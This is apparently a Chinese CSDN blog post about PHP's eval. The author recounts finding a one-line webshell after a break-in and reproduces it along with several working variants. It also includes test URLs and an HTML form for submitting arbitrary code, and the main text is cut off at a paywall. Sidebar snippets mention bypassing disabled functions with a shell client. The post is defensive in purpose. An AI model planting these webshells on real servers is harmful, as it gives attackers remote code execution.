【php安全】eval的禁止【原创】

最新推荐文章于 2024-07-17 14:18:31 发布
最新推荐文章于 2024-07-17 14:18:31 发布
阅读量1.6w 收藏 6
点赞数 2
分类专栏: PHP 文章标签: php 黑客 一句话木马 eval
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiandanokok/article/details/51387940
版权
尽管eval()不能通过php.ini的disable_functions禁用,但可以通过安装Suhosin扩展并在配置中设置suhosin.executor.disable_eval = on来禁止。本文介绍了这一方法及其实施步骤。
摘要由CSDN通过智能技术生成
前段时间,网站遭受了黑客的入侵,后来在排查中发现了一个php,里面的内容只有很少:


<?php eval($_POST[asda123131323156341]);?>

然后网上搜索一下php的eval函数,发现这个eval函数带有很大的安全隐患。
本地测试一下,在本地环境写一个php,内容如下:
default.php:
<?php eval($_GET[asda]);?>
然后访问一下:localhost/test/default.php?asda=phpinfo();
就可以看到已经把phpinfo给执行了。
或者是访问localhost/test/default.php?asda = echo 11111;同样也会发现1111被echo出来了。
类似的手段还有:
<?php $code="${${eval($_GET[c])}}";?>
访问localhost/test/default.php?c=phpinfo();即可看到

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?> 
访问localhost/test/default.php?c= ${${phpinfo()}};即可看到

利用可以执行php的eval函数,黑客可以用这个来上传一些后台木马,比如说上传php,然后通过url访问这个php来获得更大的权限。这种称为一句话木马的入侵。比如说:写一个html,内容如下: 
<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>
然后写一个default.php,内容为:
<?php eval($_POST[c]);?>
这样的话,想执行什么php就可以直接提交运行即可。


所以: eval()对于php安全来说具有很大的杀伤力,
最低0.47元/天 解锁文章
jiandanokok
关注
专栏目录
PHP eval函数使用介绍
10-26
总之,PHP eval函数是一个需要慎用的功能,它提供了强大的动态执行代码的能力,但同时也伴随着安全风险。只有在开发者对代码安全性有充分控制,并且了解所有潜在风险的情况下,才应该考虑使用eval函数。在大多数情况...
绕过宝塔禁止php函数,宝塔disable functions函数全被禁命令执行+加域服务器如何无限制执行命令...
weixin_42193786的博客
04-08 1742
本地搭建实验环境时遇到了不少小问题实验环境2008 R2宝塔搭建的IIS discuz3.2X手动上传shell冰蝎连接(ps:有表哥使用冰蝎的时候提示文件存在但是无法获取密钥,解决办法,使用最新版本的冰蝎即可,具体详情看更新日志)连接上shell发现无法执行命令???查看phpinfo原来是禁用了函数……几乎能用的都禁用了想想很奇怪,刚搭建的网站那就是是默认值,为啥平时日站不是这样的,东查西查之...
Linux CentOS 宝塔中禁用php8.2的eval函数详细图文教程
php菜鸟技术天地
06-27 267
【代码】Linux CentOS 宝塔中禁用php8.2的eval函数详细图文教程。
Web安全:文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2696
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
post防注入过滤 php,php防注入过滤客户提交$_GET 和$_POST参数_PHP教程
weixin_35786770的博客
03-12 118
/*** 安全防范*/function Add_S($array){foreach($array as $key=>$value){if(!is_array($value)){$value = get_magic_quotes_gpc()?$value:addslashes($value);$array[$key]=filterHtml($value);}Else{Add_S($array[...
php 判断函数禁用,php禁用函数设置及查看方法的介绍(附示例)
weixin_33168794的博客
03-10 668
本篇文章给大家带来的内容是关于php禁用函数设置及查看方法的介绍(附示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。这篇文章主要介绍了php禁用函数设置及查看方法,结合实例形式分析了php禁用函数的方法及使用php探针查看禁用函数信息的相关实现技巧,需要的朋友可以参考下本文实例讲述了php禁用函数设置及查看方法。分享给大家供大家参考,具体如下:打开PHP.INI,找到这行:d...
全网最完整php禁用eval函数讲解
张无忌
08-02 2065
eval是一个语言构造器,并不是系统组件函数,因此我们在php.ini中使用disable_functions是无法禁止它的。
phpeval函数的危害与正确禁用方法
10-25
当确实需要禁止`eval()`时,可以考虑采用如Suhosin这样的安全扩展。在编写代码时,始终应该优先选择安全的编程实践,例如预编译模板系统、面向对象编程等,以减少对`eval()`的依赖,从而提高应用程序的安全性和可靠...
php eval函数用法总结
12-19
`eval()` 函数在 PHP 中是一个非常强大的工具,它允许我们将字符串当作 PHP 代码执行。这个功能在某些情况下非常有用,比如动态生成代码或者在数据库中存储和执行脚本。然而,由于其潜在的安全风险,使用时需要格外...
php禁用eval,php如何禁用eval
weixin_28931737的博客
03-10 704
php禁用eval的方法:1、安装编译工具;2、安装suhosin;3、配置php支持suhosin;4、编辑phpinfo.php配置文件,修改配置【suhosin.executor.disable_eval = on】即可。具体方法:(推荐教程:php图文教程)1、安装编译工具yum install wget make gcc gcc-c++ zlib-devel openssl opens...
php eval 禁止,php5.x禁用eval的操作方法
weixin_33503373的博客
03-09 270
这次我们来说如何禁止php代码中执行eval函数,本来以为直接修改php.ini中的disable_function即可~但现实往往并不是那么如意,查了一下GG,发现原来eval并非函数,而是php底层提供的一种特性。幸好有前辈提供了php扩展来禁用万恶的eval: suhosin一开始发现是需要给php打补丁,我是拒绝的,但确实没有找到更好的方法。不过实际安装下来,真的很方便:yum insta...
Linux解决PHP7以上禁用eval函数方法
最新发布
Jifei5201314的博客
07-17 325
Linux解决PHP7以上禁用eval函数方法
禁用eval函数
weixin_44706754的博客
04-19 2682
PHP 4, PHP 5, PHP 7) 无论是linux服务器还是windows服务器,eval命令是非常危险的 一、如何禁用eval命令 在php.ini中这样设置disable_functions =eval是无法禁用eval的,根据php手册说明,eval是一个语言构造器而不是一个函数。如果要禁用eval,则需要第三方扩展,使用Suhosin linux下suhosin的安装: wg...
Linux CentOS 禁用phpeval函数详细图文教程
php菜鸟技术天地
11-04 495
github 地址 : https://github.com/mk-j/PHP_diseval_extension。eval()对于php安全来说具有很大的杀伤力,因此一般不用的情况下为了防止类似如下的一句话木马入侵,需要禁止!因此我们在php.ini中使用disable_functions是无法禁止它的。3-2-2.只安装一个PHP版的(都是安装php5.6)3-1.下载PHP_diseval_extension。3-2.找到服务器当前使用的PHP、存储路径等。3-2-1.安装多个PHP版的。
JavaScript中eval()风险
m0_37607945的博客
12-20 743
寻找其他替代方法来实现你的功能,如使用JSON.parse()解析JSON数据,或者使用特定的函数、库或API来处理动态代码。对于一些特定的情况,比如在安全的上下文中执行用户提供的脚本,你可以考虑使用nonce(一次性密码)或哈希来验证脚本的完整性。,确保对所有用户提供的输入进行严格的验证和清理,确保它们不包含任何可能被解释为恶意代码的字符或序列。安全风险的认识,鼓励他们遵循最佳实践,并在必要时寻求安全专家的建议。而导致的CWE-94漏洞的风险。的权限,使其只能访问有限的全局对象和函数。
eval会存在安全隐患
yigeng3663的博客
06-03 863
可以使用ast.literal_eval 代替
php7.0版本以下 禁用eval函数以及其他危险函数
Jifei5201314的博客
03-04 317
说明: php安装目录:/usr/local/php5 php.ini配置文件路径:/usr/local/php5/etc/php.ini Nginx安装目录:/usr/local/nginx Nginx网站根目录:/usr/local/nginx/html 1、安装编译工具 yum install wget make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils patch perl 2、安装suhosi..
怎样禁止phpeval
06-13
禁止PHP中的eval函数可以通过以下几种方法来实现: 1. 使用php.ini配置文件:在php.ini中,可以通过设置disable_functions参数来禁用eval函数。将disable_functions参数设置为以下内容即可禁用eval函数: ``` ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值